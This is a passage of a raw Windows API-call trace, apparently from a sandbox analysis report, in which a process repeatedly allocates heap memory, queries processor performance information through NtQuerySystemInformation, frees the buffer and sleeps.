ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.738] Sleep (dwMilliseconds=0x110) [0208.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.753] Sleep (dwMilliseconds=0x110) [0208.791] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.791] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.791] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.792] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.792] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.792] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.792] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.792] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.793] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.794] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.795] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.796] Sleep (dwMilliseconds=0x110) [0208.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.834] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.834] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.835] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.835] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.835] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.836] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.836] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.836] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.837] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.837] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.838] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.838] Sleep (dwMilliseconds=0x110) [0208.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.846] Sleep (dwMilliseconds=0x110) [0208.856] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.856] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.857] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.857] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.857] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.862] Sleep (dwMilliseconds=0x110) [0208.873] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.873] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.877] Sleep (dwMilliseconds=0x110) [0208.887] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.894] Sleep (dwMilliseconds=0x110) [0208.904] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.904] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.907] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.908] Sleep (dwMilliseconds=0x110) [0208.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.927] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.928] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.928] Sleep (dwMilliseconds=0x110) [0208.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.938] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.940] Sleep (dwMilliseconds=0x110) [0208.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.957] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.957] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.958] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.958] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.958] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.959] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.959] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.959] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.960] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.960] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.961] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.961] Sleep (dwMilliseconds=0x110) [0208.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.970] Sleep (dwMilliseconds=0x110) [0208.985] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.990] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.991] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.991] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.992] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.992] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.992] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.993] Sleep (dwMilliseconds=0x110) [0209.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.005] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.021] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 